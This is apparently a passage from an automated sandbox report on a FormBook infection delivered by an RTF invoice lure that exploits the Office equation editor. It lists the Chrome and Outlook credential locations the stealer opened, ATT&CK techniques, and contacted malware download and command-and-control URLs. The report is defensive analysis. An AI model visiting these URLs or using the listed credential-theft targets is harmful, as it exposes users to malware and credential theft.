            Source: Yara matchFile source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts33
            Exploitation for Client Execution            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory14
            System Information Discovery            		Remote Desktop Protocol1
            Browser Session Hijacking            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
            Obfuscated Files or Information            		NTDS2
            Security Software Discovery            		Distributed Component Object Model1
            Email Collection            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Install Root Certificate            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Masquerading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Modify Registry            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
            Virtualization/Sandbox Evasion            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
            Process Injection            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1441061 Sample: Beauty_Stem_Invoice.doc Startdate: 14/05/2024 Architecture: WINDOWS Score: 100 47 www.aceautocorp.com 2->47 49 aceautocorp.com 2->49 75 Snort IDS alert for network traffic 2->75 77 Multi AV Scanner detection for domain / URL 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 13 other signatures 2->81 12 WINWORD.EXE 336 14 2->12         started        signatures3 process4 process5 14 EQNEDT32.EXE 11 12->14         started        19 EQNEDT32.EXE 12->19         started        dnsIp6 57 covid19help.top 172.67.175.222, 443, 49163 CLOUDFLARENETUS United States 14->57 41 C:\Users\user\AppData\Roaming\op33779.scr, PE32 14->41 dropped 43 C:\Users\user\AppData\Local\...\opszx[1].scr, PE32 14->43 dropped 61 Installs new ROOT certificates 14->61 63 Office equation editor establishes network connection 14->63 65 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->65 21 op33779.scr 2 14->21         started        file7 signatures8 process9 signatures10 87 Machine Learning detection for dropped file 21->87 89 Injects a PE file into a foreign processes 21->89 24 op33779.scr 21->24         started        process11 signatures12 91 Maps a DLL or memory area into another process 24->91 27 gpgLFpElQuxhEi.exe 24->27 injected process13 signatures14 93 Maps a DLL or memory area into another process 27->93 95 Found direct / indirect Syscall (likely to bypass EDR) 27->95 30 dfrgui.exe 1 20 27->30         started        process15 dnsIp16 59 www.sqlite.org 45.33.6.223, 49165, 80 LINODE-APLinodeLLCUS United States 30->59 45 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 30->45 dropped 67 Tries to steal Mail credentials (via file / registry access) 30->67 69 Tries to harvest and steal browser information (history, passwords, etc) 30->69 71 Maps a DLL or memory area into another process 30->71 73 Queues an APC in another process (thread injection) 30->73 35 gpgLFpElQuxhEi.exe 30->35 injected 39 firefox.exe 30->39         started        file17 signatures18 process19 dnsIp20 51 www.99b6q.xyz 35->51 53 www.kinkynerdspro.blog 54.38.220.85, 49166, 49167, 49168 OVHFR France 35->53 55 6 other IPs or domains 35->55 83 Found direct / indirect Syscall (likely to bypass EDR) 35->83 signatures21 85 Performs DNS queries to domains with low reputation 51->85

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Beauty_Stem_Invoice.doc40%VirustotalBrowse
            Beauty_Stem_Invoice.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scr100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\op33779.scr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.xn--matfrmn-jxa4m.se0%VirustotalBrowse
            covid19help.top26%VirustotalBrowse
            aceautocorp.com1%VirustotalBrowse
            www.terelprime.com4%VirustotalBrowse
            www.besthomeincome24.com0%VirustotalBrowse
            www.kinkynerdspro.blog4%VirustotalBrowse
            www.99b6q.xyz0%VirustotalBrowse
            www.aceautocorp.com1%VirustotalBrowse
            www.primeplay88.org4%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://ocsp.entrust.net030%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
            https://covid19help.top/opszx.scrj100%Avira URL Cloudmalware
            http://www.kinkynerdspro.blog/ufuh/0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://www.primeplay88.org/ufuh/?f6=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&kjBDU=ZblXcjBhG0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/ufuh/?f6=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&kjBDU=ZblXcjBhG0%Avira URL Cloudsafe
            http://www.xn--matfrmn-jxa4m.se/ufuh/0%Avira URL Cloudsafe
            http://www.primeplay88.org/ufuh/0%Avira URL Cloudsafe
            https://covid19help.top/opszx.scr100%Avira URL Cloudmalware
            http://www.searchvity.com/?dn=3%VirustotalBrowse
            http://www.terelprime.com/ufuh/?f6=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&kjBDU=ZblXcjBhG100%Avira URL Cloudmalware
            http://www.kinkynerdspro.blog/ufuh/2%VirustotalBrowse
            https://covid19help.top/opszx.scrjjC:100%Avira URL Cloudmalware
            http://www.primeplay88.org0%Avira URL Cloudsafe
            https://covid19help.top/tc100%Avira URL Cloudmalware
            http://www.xn--matfrmn-jxa4m.se/ufuh/0%VirustotalBrowse
            http://www.kinkynerdspro.blog/ufuh/?f6=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&kjBDU=ZblXcjBhG0%Avira URL Cloudsafe
            http://www.searchvity.com/0%Avira URL Cloudsafe
            https://covid19help.top/100%Avira URL Cloudmalware
            http://www.usertrust.0%Avira URL Cloudsafe
            http://www.primeplay88.org/ufuh/4%VirustotalBrowse
            http://www.primeplay88.org4%VirustotalBrowse
            http://www.searchvity.com/4%VirustotalBrowse
            https://covid19help.top/26%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.xn--matfrmn-jxa4m.se
            		194.9.94.86
            		truetrueunknown
            covid19help.top
            		172.67.175.222
            		truetrueunknown
            parkingpage.namecheap.com
            		91.195.240.19
            		truefalse
              		high
              aceautocorp.com
              		198.12.241.35
              		truefalseunknown
              www.sqlite.org
              		45.33.6.223
              		truefalse
                		high
                www.kinkynerdspro.blog
                		54.38.220.85
                		truetrueunknown
                www.terelprime.com
                		66.96.161.166
                		truetrueunknown
                www.99b6q.xyz
                		unknown
                		unknowntrueunknown
                www.besthomeincome24.com
                		unknown
                		unknownfalseunknown
                www.aceautocorp.com
                		unknown
                		unknownfalseunknown
                www.primeplay88.org
                		unknown
                		unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.primeplay88.org/ufuh/?f6=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&kjBDU=ZblXcjBhGtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.kinkynerdspro.blog/ufuh/true
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.sqlite.org/2016/sqlite-dll-win32-x86-3130000.zipfalse
                  		high
                  http://www.xn--matfrmn-jxa4m.se/ufuh/?f6=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&kjBDU=ZblXcjBhGtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.xn--matfrmn-jxa4m.se/ufuh/true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.primeplay88.org/ufuh/true
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://covid19help.top/opszx.scrtrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.terelprime.com/ufuh/?f6=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&kjBDU=ZblXcjBhGtrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.kinkynerdspro.blog/ufuh/?f6=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&kjBDU=ZblXcjBhGtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabdfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                    		high
                    https://duckduckgo.com/ac/?q=dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                      		high
                      http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://static.loopia.se/responsive/images/iOS-72.pngdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                        		high
                        https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                          		high
                          https://static.loopia.se/shared/logo/logo-loopia-white.svgdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                            		high
                            https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwedfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                              		high
                              https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                		high
                                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  https://covid19help.top/opszx.scrjEQNEDT32.EXE, 00000002.00000002.351925217.000000000053F000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.searchvity.com/?dn=dfrgui.exe, 00000008.00000002.629053445.0000000002D26000.00000004.10000000.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.0000000003306000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.477631592.00000000019E6000.00000004.80000000.00040000.00000000.sdmpfalse
                                  • 3%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sqlite.org/copyright.html.dfrgui.exe, 00000008.00000002.629727705.0000000061E9E000.00000008.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drfalse
                                    		high
                                    https://static.loopia.se/shared/images/additional-pages-hero-shape.webpdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://static.loopia.se/shared/style/2022-extra-pages.cssdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://static.loopia.se/responsive/images/iOS-114.pngdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://covid19help.top/opszx.scrjjC:EQNEDT32.EXE, 00000002.00000002.351925217.0000000000582000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                		high
                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchdfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                  		high
                                                  http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://www.primeplay88.orggpgLFpElQuxhEi.exe, 0000000C.00000002.628854731.0000000000A23000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • 4%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://covid19help.top/tcEQNEDT32.EXE, 00000002.00000002.351925217.0000000000568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://static.loopia.se/responsive/styles/reset.cssdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/favicon.ico13d6pS3.8.drfalse
                                                        		high
                                                        https://ac.ecosia.org/autocomplete?q=dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                          		high
                                                          https://static.loopia.se/responsive/images/iOS-57.pngdfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
